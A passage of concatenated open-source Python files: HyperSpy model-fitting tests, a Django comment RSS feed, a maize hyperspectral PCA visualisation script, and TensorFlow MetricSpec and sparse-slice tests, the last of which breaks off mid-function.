m.append(g)
g.sigma.value = 1
g.centre.value = 0.5
g.A.value = 1e3
self.m = m
def test_fit_fmin_leastsq(self):
self.m.fit(fitter="fmin", method="ls")
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14519369)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610743285)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380705455)
def test_fit_fmin_ml(self):
self.m.fit(fitter="fmin", method="ml")
np.testing.assert_almost_equal(self.m[0].A.value, 10001.39613936,
decimal=3)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.104151206314,
decimal=6)
np.testing.assert_almost_equal(self.m[0].sigma.value, 2.00053642434)
def test_fit_leastsq(self):
self.m.fit(fitter="leastsq")
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526082, 1)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610727064)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707571, 5)
def test_fit_mpfit(self):
self.m.fit(fitter="mpfit")
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526286, 5)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610718444)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707614)
def test_fit_odr(self):
self.m.fit(fitter="odr")
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14531979, 3)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610724054)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380709939)
def test_fit_leastsq_grad(self):
self.m.fit(fitter="leastsq", grad=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526084)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.11061073306)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707552)
def test_fit_mpfit_grad(self):
self.m.fit(fitter="mpfit", grad=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526084)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.11061073306)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707552)
def test_fit_odr_grad(self):
self.m.fit(fitter="odr", grad=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14531979, 3)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610724054)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380709939)
def test_fit_bounded(self):
self.m[0].centre.bmin = 0.5
# self.m[0].bounded = True
self.m.fit(fitter="mpfit", bounded=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 4)
np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)
def test_fit_bounded_bad_starting_values(self):
self.m[0].centre.bmin = 0.5
self.m[0].centre.value = -1
# self.m[0].bounded = True
self.m.fit(fitter="mpfit", bounded=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 4)
np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)
@nt.raises(ValueError)
def test_wrong_method(self):
self.m.fit(method="dummy")
class TestModelWeighted:
def setUp(self):
np.random.seed(1)
s = hs.signals.SpectrumSimulation(np.arange(10, 100, 0.1))
s.metadata.set_item("Signal.Noise_properties.variance",
hs.signals.Spectrum(np.arange(10, 100, 0.01)))
s.axes_manager[0].scale = 0.1
s.axes_manager[0].offset = 10
s.add_poissonian_noise()
m = s.create_model()
m.append(hs.model.components.Polynomial(1))
self.m = m
def test_fit_leastsq_binned(self):
self.m.signal.metadata.Signal.binned = True
self.m.fit(fitter="leastsq", method="ls")
for result, expected in zip(self.m[0].coefficients.value,
(9.9165596693502778, 1.6628238107916631)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_odr_binned(self):
self.m.signal.metadata.Signal.binned = True
self.m.fit(fitter="odr", method="ls")
for result, expected in zip(self.m[0].coefficients.value,
(9.9165596548961972, 1.6628247412317521)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_mpfit_binned(self):
self.m.signal.metadata.Signal.binned = True
self.m.fit(fitter="mpfit", method="ls")
for result, expected in zip(self.m[0].coefficients.value,
(9.9165596607108739, 1.6628243846485873)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_fmin_binned(self):
self.m.signal.metadata.Signal.binned = True
self.m.fit(
fitter="fmin",
method="ls",
)
for result, expected in zip(self.m[0].coefficients.value,
(9.9137288425667442, 1.8446013472266145)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_leastsq_unbinned(self):
self.m.signal.metadata.Signal.binned = False
self.m.fit(fitter="leastsq", method="ls")
for result, expected in zip(
self.m[0].coefficients.value,
(0.99165596391487121, 0.16628254242532492)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_odr_unbinned(self):
self.m.signal.metadata.Signal.binned = False
self.m.fit(fitter="odr", method="ls")
for result, expected in zip(
self.m[0].coefficients.value,
(0.99165596548961943, 0.16628247412317315)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_mpfit_unbinned(self):
self.m.signal.metadata.Signal.binned = False
self.m.fit(fitter="mpfit", method="ls")
for result, expected in zip(
self.m[0].coefficients.value,
(0.99165596295068958, 0.16628257462820528)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_fmin_unbinned(self):
self.m.signal.metadata.Signal.binned = False
self.m.fit(
fitter="fmin",
method="ls",
)
for result, expected in zip(
self.m[0].coefficients.value,
(0.99136169230026261, 0.18483060534056939)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_chisq(self):
self.m.signal.metadata.Signal.binned = True
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.chisq.data, 3029.16949561)
def test_red_chisq(self):
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.red_chisq.data, 3.37700055)
class TestModelScalarVariance:
def setUp(self):
s = hs.signals.SpectrumSimulation(np.ones(100))
m = s.create_model()
m.append(hs.model.components.Offset())
self.s = s
self.m = m
def test_std1_chisq(self):
std = 1
np.random.seed(1)
self.s.add_gaussian_noise(std)
self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.chisq.data, 78.35015229)
def test_std10_chisq(self):
std = 10
np.random.seed(1)
self.s.add_gaussian_noise(std)
self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.chisq.data, 78.35015229)
def test_std1_red_chisq(self):
std = 1
np.random.seed(1)
self.s.add_gaussian_noise(std)
self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.red_chisq.data, 0.79949135)
def test_std10_red_chisq(self):
std = 10
np.random.seed(1)
self.s.add_gaussian_noise(std)
self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.red_chisq.data, 0.79949135)
def test_std1_red_chisq_in_range(self):
std = 1
self.m.set_signal_range(10, 50)
np.random.seed(1)
self.s.add_gaussian_noise(std)
self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.red_chisq.data, 0.86206965)
class TestModelSignalVariance:
def setUp(self):
variance = hs.signals.SpectrumSimulation(
np.arange(
100, 300).reshape(
(2, 100)))
s = variance.deepcopy()
np.random.seed(1)
std = 10
s.add_gaussian_noise(std)
s.add_poissonian_noise()
s.metadata.set_item("Signal.Noise_properties.variance",
variance + std ** 2)
m = s.create_model()
m.append(hs.model.components.Polynomial(order=1))
self.s = s
self.m = m
def test_std1_red_chisq(self):
self.m.multifit(fitter="leastsq", method="ls", show_progressbar=None)
np.testing.assert_almost_equal(self.m.red_chisq.data[0],
0.79693355673230915)
np.testing.assert_almost_equal(self.m.red_chisq.data[1],
0.91453032901427167)
class TestMultifit:
def setUp(self):
s = hs.signals.Spectrum(np.zeros((2, 200)))
s.axes_manager[-1].offset = 1
s.data[:] = 2 * s.axes_manager[-1].axis ** (-3)
m = s.create_model()
m.append(hs.model.components.PowerLaw())
m[0].A.value = 2
m[0].r.value = 2
m.store_current_values()
m.axes_manager.indices = (1,)
m[0].r.value = 100
m[0].A.value = 2
m.store_current_values()
m[0].A.free = False
self.m = m
m.axes_manager.indices = (0,)
m[0].A.value = 100
def test_fetch_only_fixed_false(self):
self.m.multifit(fetch_only_fixed=False, show_progressbar=None)
np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
[3., 100.])
np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
[2., 2.])
def test_fetch_only_fixed_true(self):
self.m.multifit(fetch_only_fixed=True, show_progressbar=None)
np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
[3., 3.])
np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
[2., 2.])
def test_bounded_snapping(self):
m = self.m
m[0].A.free = True
m.signal.data *= 2.
m[0].A.value = 2.
m[0].A.bmin = 3.
m.multifit(fitter='mpfit', bounded=True, show_progressbar=None)
np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
[3., 3.])
np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
[4., 4.])
class TestStoreCurrentValues:
def setUp(self):
self.m = hs.signals.Spectrum(np.arange(10)).create_model()
self.o = hs.model.components.Offset()
self.m.append(self.o)
def test_active(self):
self.o.offset.value = 2
self.o.offset.std = 3
self.m.store_current_values()
nt.assert_equal(self.o.offset.map["values"][0], 2)
nt.assert_equal(self.o.offset.map["is_set"][0], True)
def test_not_active(self):
self.o.active = False
self.o.offset.value = 2
self.o.offset.std = 3
self.m.store_current_values()
nt.assert_not_equal(self.o.offset.map["values"][0], 2)
class TestSetCurrentValuesTo:
def setUp(self):
self.m = hs.signals.Spectrum(
np.arange(10).reshape(2, 5)).create_model()
self.comps = [
hs.model.components.Offset(),
hs.model.components.Offset()]
self.m.extend(self.comps)
def test_set_all(self):
for c in self.comps:
c.offset.value = 2
self.m.assign_current_values_to_all()
nt.assert_true((self.comps[0].offset.map["values"] == 2).all())
nt.assert_true((self.comps[1].offset.map["values"] == 2).all())
def test_set_1(self):
self.comps[1].offset.value = 2
self.m.assign_current_values_to_all([self.comps[1]])
nt.assert_true((self.comps[0].offset.map["values"] != 2).all())
nt.assert_true((self.comps[1].offset.map["values"] == 2).all())
class TestAsSignal:
def setUp(self):
self.m = hs.signals.Spectrum(
np.arange(10).reshape(2, 5)).create_model()
self.comps = [
hs.model.components.Offset(),
hs.model.components.Offset()]
self.m.extend(self.comps)
for c in self.comps:
c.offset.value = 2
self.m.assign_current_values_to_all()
def test_all_components_simple(self):
s = self.m.as_signal(show_progressbar=None)
nt.assert_true(np.all(s.data == 4.))
def test_one_component_simple(self):
s = self.m.as_signal(component_list=[0], show_progressbar=None)
nt.assert_true(np.all(s.data == 2.))
nt.assert_true(self.m[1].active)
def test_all_components_multidim(self):
self.m[0].active_is_multidimensional = True
s = self.m.as_signal(show_progressbar=None)
nt.assert_true(np.all(s.data == 4.))
self.m[0]._active_array[0] = False
s = self.m.as_signal(show_progressbar=None)
np.testing.assert_array_equal(
s.data, np.array([np.ones(5) * 2, np.ones(5) * 4]))
nt.assert_true(self.m[0].active_is_multidimensional)
def test_one_component_multidim(self):
self.m[0].active_is_multidimensional = True
s = self.m.as_signal(component_list=[0], show_progressbar=None)
nt.assert_true(np.all(s.data == 2.))
nt.assert_true(self.m[1].active)
nt.assert_false(self.m[1].active_is_multidimensional)
s = self.m.as_signal(component_list=[1], show_progressbar=None)
np.testing.assert_equal(s.data, 2.)
nt.assert_true(self.m[0].active_is_multidimensional)
self.m[0]._active_array[0] = False
s = self.m.as_signal(component_list=[1], show_progressbar=None)
nt.assert_true(np.all(s.data == 2.))
s = self.m.as_signal(component_list=[0], show_progressbar=None)
np.testing.assert_array_equal(s.data,
np.array([np.zeros(5), np.ones(5) * 2]))
class TestCreateModel:
def setUp(self):
self.s = hs.signals.Spectrum(np.asarray([0, ]))
self.im = hs.signals.Image(np.ones([1, 1, ]))
def test_create_model(self):
from hyperspy.models.model1D import Model1D
from hyperspy.models.model2D import Model2D
nt.assert_is_instance(
self.s.create_model(), Model1D)
nt.assert_is_instance(
self.im.create_model(), Model2D)
class TestAdjustPosition:
def setUp(self):
self.s = hs.signals.Spectrum(np.random.rand(10, 10, 20))
self.m = self.s.create_model()
def test_enable_adjust_position(self):
self.m.append(hs.model.components.Gaussian())
self.m.enable_adjust_position()
nt.assert_equal(len(self.m._position_widgets), 1)
# Check that both line and label was added
nt.assert_equal(len(list(self.m._position_widgets.values())[0]), 2)
def test_disable_adjust_position(self):
self.m.append(hs.model.components.Gaussian())
self.m.enable_adjust_position()
self.m.disable_adjust_position()
nt.assert_equal(len(self.m._position_widgets), 0)
def test_enable_all(self):
self.m.append(hs.model.components.Gaussian())
self.m.enable_adjust_position()
self.m.append(hs.model.components.Gaussian())
nt.assert_equal(len(self.m._position_widgets), 2)
def test_enable_all_zero_start(self):
self.m.enable_adjust_position()
self.m.append(hs.model.components.Gaussian())
nt.assert_equal(len(self.m._position_widgets), 1)
def test_manual_close(self):
self.m.append(hs.model.components.Gaussian())
self.m.append(hs.model.components.Gaussian())
self.m.enable_adjust_position()
list(self.m._position_widgets.values())[0][0].close()
nt.assert_equal(len(self.m._position_widgets), 2)
nt.assert_equal(len(list(self.m._position_widgets.values())[0]), 1)
list(self.m._position_widgets.values())[0][0].close()
nt.assert_equal(len(self.m._position_widgets), 1)
nt.assert_equal(len(list(self.m._position_widgets.values())[0]), 2)
self.m.disable_adjust_position()
nt.assert_equal(len(self.m._position_widgets), 0)
| gpl-3.0 |
hasadna/django | django/contrib/comments/feeds.py | 223 | 1037 | from django.contrib.syndication.views import Feed
from django.contrib.sites.models import get_current_site
from django.contrib import comments
from django.utils.translation import ugettext as _
class LatestCommentFeed(Feed):
"""Feed of latest comments on the current site."""
def __call__(self, request, *args, **kwargs):
self.site = get_current_site(request)
return super(LatestCommentFeed, self).__call__(request, *args, **kwargs)
def title(self):
return _("%(site_name)s comments") % dict(site_name=self.site.name)
def link(self):
return "http://%s/" % (self.site.domain)
def description(self):
return _("Latest comments on %(site_name)s") % dict(site_name=self.site.name)
def items(self):
qs = comments.get_model().objects.filter(
site__pk = self.site.pk,
is_public = True,
is_removed = False,
)
return qs.order_by('-submit_date')[:40]
def item_pubdate(self, item):
return item.submit_date
| bsd-3-clause |
shanwai1234/Maize_Phenotype_Map | hyperspectral_PCA_visualization.py | 1 | 7348 | import numpy as np
import cv2
from matplotlib import pyplot as plt
import os
import sys
from scipy import linalg as LA
from matplotlib import cm
##############################Hyperspectral Image PCA Visualization#####################################################################################################################
##############################Notice: Since all pixels were analyzed at once, more Images to be analyzed, expotential time will be cost !!!#############################################
# Copy any PlantID folder you are interested to 'test_HYP'
mfold = sys.argv[1]
# Create function PCA2 to generate first three PC coefficents for all analyzed image data
def PCA2(data, dims_rescaled_data=3):
"""
returns: data transformed in 2 dims/columns + regenerated original data
pass in: data as 2D NumPy array
"""
m, n = data.shape
# mean center the data
data -= data.mean(axis=0)
# calculate the covariance matrix
R = np.cov(data, rowvar=False)
# calculate eigenvectors & eigenvalues of the covariance matrix
# use 'eigh' rather than 'eig' since R is symmetric,
# the performance gain is substantial
evals, evecs = LA.eigh(R)
# sort eigenvalue in decreasing order
idx = np.argsort(evals)[::-1]
evecs = evecs[:,idx]
# sort eigenvectors according to same index
evals = evals[idx]
# select the first n eigenvectors (n is desired dimension
# of rescaled data array, or dims_rescaled_data)
evecs = evecs[:, :dims_rescaled_data]
# carry out the transformation on the data using eigenvectors
# and return the re-scaled data, eigenvalues, and eigenvectors
return np.dot(evecs.T, data.T).T, evals, evecs
# Seperating all analyzed pixels using the first two PCs
def plot_pca(data):
clr1 = '#2026B2'
fig = plt.figure()
ax1 = fig.add_subplot(111)
data_resc, data_orig,a = PCA2(data)
ax1.plot(data_resc[:, 0], data_resc[:, 1], '.', mfc=clr1, mec=clr1)
plt.show()
return data_resc
# Using NDVI to segment all plant area by defining threshold greater than 0.25
def rmstem(p705,p750,upper_bound,bottom_bound,left_bound,right_bound):
mypic = []
control = []
myl = np.shape(p705)[0]
myw = np.shape(p705)[1]
y1 = int(upper_bound)
y2 = int(bottom_bound)
x1 = int(left_bound)
x2 = int(right_bound)
for i in range(myl):
if i < y1 or i > y2:continue
for j in range(myw):
if j < x1 or j > x2:continue
ndvi = (p750[i,j]-p705[i,j])/(p750[i,j]+p705[i,j])
if ndvi > 0.25:
n = []
n.append(i)
n.append(j)
mypic.append(n)
else:
m = []
m.append(i)
m.append(j)
control.append(m)
return mypic,control
# Calculating the median intensity of pixels in the non-plant area
def NP(target, pic2):
final = []
for k in target:
i = k[0]
j = k[1]
final.append(pic2[i,j])
fnum = np.median(final)
return fnum
# Storing the reflectance of each pixel and their corresponding positions in the original image
def PCA(target, k, pic2, n):
final = {}
for a in target:
i = a[0]
j = a[1]
myname = "{0}-{1}-{2}".format(i,j,n)
final[myname] = pic2[i,j]/k
return final
# sh is the reference file showing which file corresponds to which wavelength
sh = open('wavelength_foldid.txt','r')
sh.readline()
kdict = {}
# build a library to include file~wavelength information
for line in sh:
new = line.strip().split('\t')
kdict[new[-1]] = new[0]
sh.close()
# because of no germination in most of first three days, we just skip them to speed up running the code
first3 = set([])
for i in range(1,4):
first3.add('Day_'+str(i).zfill(3))
ll = []
whole = os.listdir(mfold)
mdict = {}
tlist = []
# The date you want to visualize, e.g. Day_028
date = sys.argv[2]
for j1 in whole:
tlist.append(j1)
for i1 in os.listdir('{0}/{1}/HYP SV 90/'.format(mfold,j1)):
if i1 != date:continue
subset = os.listdir('{0}/{1}/HYP SV 90/{2}'.format(mfold,j1,i1))
# in every folder, the images of 35_0_0.png and 45_0_0.png should be used firstly in order to subtract the plant area
if True:
m705 = cv2.imread('{0}/{1}/HYP SV 90/{2}/35_0_0.png'.format(mfold,j1,i1))
m750 = cv2.imread('{0}/{1}/HYP SV 90/{2}/45_0_0.png'.format(mfold,j1,i1))
# converting plant images from RGB to GRAY channel
tm705 = cv2.cvtColor(m705,cv2.COLOR_BGR2GRAY)
tm750 = cv2.cvtColor(m750,cv2.COLOR_BGR2GRAY)
tm705 = tm705.astype(np.float)
tm750 = tm750.astype(np.float)
# defining the interested area that we are going to analyze the plant
rmg,back = rmstem(tm705,tm750,45,445,30,273)
for i in subset:
# first two images are not useful and just skip them
if i == '0_0_0.png':continue
if i == '1_0_0.png':continue
# info.txt is not an image file
if i == 'info.txt':continue
name = i.replace('_0_0.png','')
t = cv2.imread('{0}/{1}/HYP SV 90/{2}/{3}'.format(mfold,j1,i1,i))
t = t.astype(np.float)
t1 = t[:,:,0]
# multiply each files in the folder with the binarized image. For each pixel, dividing 255 to make each pixel in 0~1
cint = NP(back,t1)
total = PCA(rmg,cint,t1,j1)
if name not in mdict:
mdict[name] = {}
mdict[name].update(total)
wavelengths = list(mdict)
pixels = list(mdict[wavelengths[0]])
else:
print j1
for p in pixels:
ll.append([])
for w in wavelengths:
ll[-1].append(mdict[w][p])
ll_array = np.array(ll)
data_resc = plot_pca(ll_array)
myxvals = {}
myyvals = {}
mycvals = {}
myplant = set([])
for x in range(3):
mytitle = "PC {0}".format(x+1)
for name,val in zip(pixels,data_resc[:,x]):
l = map(int,name.split('-')[:2])
myplant.add(name.split('-')[2])
myid = 'PC'+str(x)+'-'+name.split('-')[2]
if myid not in myxvals:
myxvals[myid] = []
myyvals[myid] = []
mycvals[myid] = []
myyvals[myid].append(l[0]*(-1))
myxvals[myid].append(l[1])
mycvals[myid].append(val)
n = 0
myxtick = []
myxname = []
ncvals = {}
for i in myplant:
myxname.append(i)
pc0 = 'PC0'+'-'+i
pc1 = 'PC1'+'-'+i
pc2 = 'PC2'+'-'+i
if i not in ncvals:
ncvals[i] = {}
ncvals[i][pc0] = []
ncvals[i][pc1] = []
ncvals[i][pc2] = []
# b is real value of pc value, a is the position of pc value
for a,b in enumerate(mycvals[pc0]):
name = str(myyvals[pc0][a])+'-'+str(myxvals[pc0][a])
if name not in ncvals[i]:
ncvals[i][name] = []
# normalize PCA components for each plant of each genotype by the formula: normalized_value = (value-min_value)/(max_value-min_value)
ncvals[i][name].append((mycvals[pc0][a]-min(mycvals[pc0]))/(max(mycvals[pc0])-min(mycvals[pc0])))
ncvals[i][name].append((mycvals[pc1][a]-min(mycvals[pc1]))/(max(mycvals[pc1])-min(mycvals[pc1])))
ncvals[i][name].append((mycvals[pc2][a]-min(mycvals[pc2]))/(max(mycvals[pc2])-min(mycvals[pc2])))
n = 0
plt.show()
fig = plt.figure()
ax = fig.add_subplot('111')
num = 0
for i in myplant:
xvals = []
yvals = []
cvals = []
pc0 = 'PC0'+'-'+i
nx = max(myxvals[pc0])-min(myxvals[pc0])
ny = max(myyvals[pc0])-min(myyvals[pc0])
for ii in range(nx):
x = ii + min(myxvals[pc0])
for jj in range(ny):
y = jj + min(myyvals[pc0])
pos = str(y)+'-'+str(x)
if pos in ncvals[i]:
clist = ncvals[i][pos]
xvals.append(ii+num*250)
yvals.append(jj)
cvals.append((clist[0],clist[1],clist[2]))
myxtick.append(np.median(xvals))
myxname.append(i)
num += 1
ax.scatter(xvals,yvals,color=cvals)
ax.set_xticks(myxtick)
ax.set_xticklabels(myxname)
ax.set_yticklabels([])
plt.show()
| bsd-3-clause |
DCSaunders/tensorflow | tensorflow/contrib/learn/python/learn/metric_spec_test.py | 13 | 9091 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for MetricSpec."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.metric_spec import MetricSpec
def test_metric(predictions, labels, weights=None):
return predictions, labels, weights
class MetricSpecTest(tf.test.TestCase):
def test_create_metric_ops(self):
features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
labels = {"label1": "label1_tensor", "label2": "label2_tensor"}
predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}
passed = MetricSpec(metric_fn=test_metric,
prediction_key="pred1",
label_key="label1",
weight_key="feature2").create_metric_ops(features,
labels,
predictions)
self.assertEqual(passed[0], "pred1_tensor")
self.assertEqual(passed[1], "label1_tensor")
self.assertEqual(passed[2], "feature2_tensor")
def test_no_weight(self):
features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
labels = {"label1": "label1_tensor", "label2": "label2_tensor"}
predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}
passed = MetricSpec(metric_fn=test_metric,
prediction_key="pred1",
label_key="label1").create_metric_ops(features, labels,
predictions)
self.assertEqual(passed[0], "pred1_tensor")
self.assertEqual(passed[1], "label1_tensor")
self.assertEqual(passed[2], None)
def test_fail_no_prediction(self):
features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
labels = {"label1": "label1_tensor", "label2": "label2_tensor"}
predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}
self.assertRaisesRegexp(ValueError,
"MetricSpec without specified prediction_key "
"requires predictions tensor or single element "
"dict, got",
MetricSpec(metric_fn=test_metric,
label_key="label1",
weight_key="feature2").create_metric_ops,
features, labels, predictions)
def test_fail_no_label(self):
features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
labels = {"label1": "label1_tensor", "label2": "label2_tensor"}
predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}
self.assertRaisesRegexp(ValueError,
"MetricSpec without specified label_key requires "
"labels tensor or single element dict, got",
MetricSpec(metric_fn=test_metric,
prediction_key="pred1",
weight_key="feature2").create_metric_ops,
features, labels, predictions)
def test_single_prediction(self):
features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
labels = {"label1": "label1_tensor", "label2": "label2_tensor"}
predictions = "pred1_tensor"
passed = MetricSpec(metric_fn=test_metric,
label_key="label1",
weight_key="feature2").create_metric_ops(features,
labels,
predictions)
self.assertEqual(passed[0], "pred1_tensor")
self.assertEqual(passed[1], "label1_tensor")
self.assertEqual(passed[2], "feature2_tensor")
def test_single_label(self):
features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
labels = "label1_tensor"
predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}
passed = MetricSpec(metric_fn=test_metric,
prediction_key="pred1",
weight_key="feature2").create_metric_ops(features,
labels,
predictions)
self.assertEqual(passed[0], "pred1_tensor")
self.assertEqual(passed[1], "label1_tensor")
self.assertEqual(passed[2], "feature2_tensor")
def test_fail_single_prediction(self):
features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
labels = {"label1": "label1_tensor", "label2": "label2_tensor"}
predictions = "pred1_tensor"
self.assertRaisesRegexp(ValueError,
"MetricSpec with prediction_key specified requires "
"predictions dict, got",
MetricSpec(metric_fn=test_metric,
prediction_key="pred1",
label_key="label1",
weight_key="feature2").create_metric_ops,
features, labels, predictions)
def test_fail_single_label(self):
features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
labels = "label1_tensor"
predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}
self.assertRaisesRegexp(ValueError,
"MetricSpec with label_key specified requires "
"labels dict, got",
MetricSpec(metric_fn=test_metric,
prediction_key="pred1",
label_key="label1",
weight_key="feature2").create_metric_ops,
features, labels, predictions)
def test_str(self):
metric_spec = MetricSpec(metric_fn=test_metric,
label_key="label1",
prediction_key="pred1",
weight_key="feature2")
string = str(metric_spec)
self.assertIn("test_metric", string)
self.assertIn("label1", string)
self.assertIn("pred1", string)
self.assertIn("feature2", string)
def test_partial_str(self):
def custom_metric(predictions, labels, stuff, weights=None):
return predictions, labels, weights, stuff
partial_metric = functools.partial(custom_metric, stuff=5)
metric_spec = MetricSpec(metric_fn=partial_metric,
label_key="label1",
prediction_key="pred1",
weight_key="feature2")
self.assertIn("custom_metric", str(metric_spec))
def test_partial(self):
features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
labels = {"label1": "label1_tensor"}
predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}
def custom_metric(predictions, labels, stuff, weights=None):
if stuff:
return predictions, labels, weights
else:
raise ValueError("Nooooo")
partial_metric = functools.partial(custom_metric, stuff=5)
passed = MetricSpec(metric_fn=partial_metric,
label_key="label1",
prediction_key="pred1",
weight_key="feature2").create_metric_ops(features,
labels,
predictions)
self.assertEqual(passed[0], "pred1_tensor")
self.assertEqual(passed[1], "label1_tensor")
self.assertEqual(passed[2], "feature2_tensor")
broken_partial_metric = functools.partial(custom_metric, stuff=0)
self.assertRaisesRegexp(ValueError,
"Nooooo",
MetricSpec(metric_fn=broken_partial_metric,
prediction_key="pred1",
label_key="label1",
weight_key="feature2").create_metric_ops,
features, labels, predictions)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 |
arborh/tensorflow | tensorflow/python/kernel_tests/sparse_slice_op_test.py | 22 | 13631 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SparseReorder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import test_util
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import sparse_ops
import tensorflow.python.ops.sparse_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
class SparseSliceOpTest(test.TestCase):
def _SparseTensor_4x6(self, val_dtype=np.int64):
# [0 | |2 | |4 |5 ]
# [ |11| |13|14| ]
# [20| | |23| |25]
# [30| |32|33| |35]
ind = np.array([[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3], [1,
4], [2, 0],
[2, 3], [2, 5], [3, 0], [3, 2], [3, 3], [3, 5]]).astype(
np.int64)
val = np.array([0, 2, 4, 5, 11, 13, 14, 20, 23, 25, 30, 32, 33, 35]).astype(
val_dtype)
shape = np.array([4, 6]).astype(np.int64)
return sparse_tensor.SparseTensor(ind, val, shape)
def _SparseTensor_5x7(self):
# [0 | |2 | |4 |5 | ]
# [ |11| |13|14| |16]
# [20| | |23| |25| ]
# [30| |32|33| |35| ]
# [ |41| | |44| |46]
ind = np.array([[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3], [1, 4],
[1, 6], [2, 0], [2, 3], [2, 5], [3, 0], [3, 2], [3, 3],
[3, 5], [4, 1], [4, 4], [4, 6]]).astype(np.int64)
val = np.array(
[0, 2, 4, 5, 11, 13, 14, 16, 20, 23, 25, 30, 32, 33, 35, 41, 44,
46]).astype(np.int64)
shape = np.array([5, 7]).astype(np.int64)
return sparse_tensor.SparseTensor(ind, val, shape)
def _SparseTensorValue_3x4x2(self):
# slice(:,:, 0)
# ['a0'| |'b0'| ]
# [ |'c0'| |'d0']
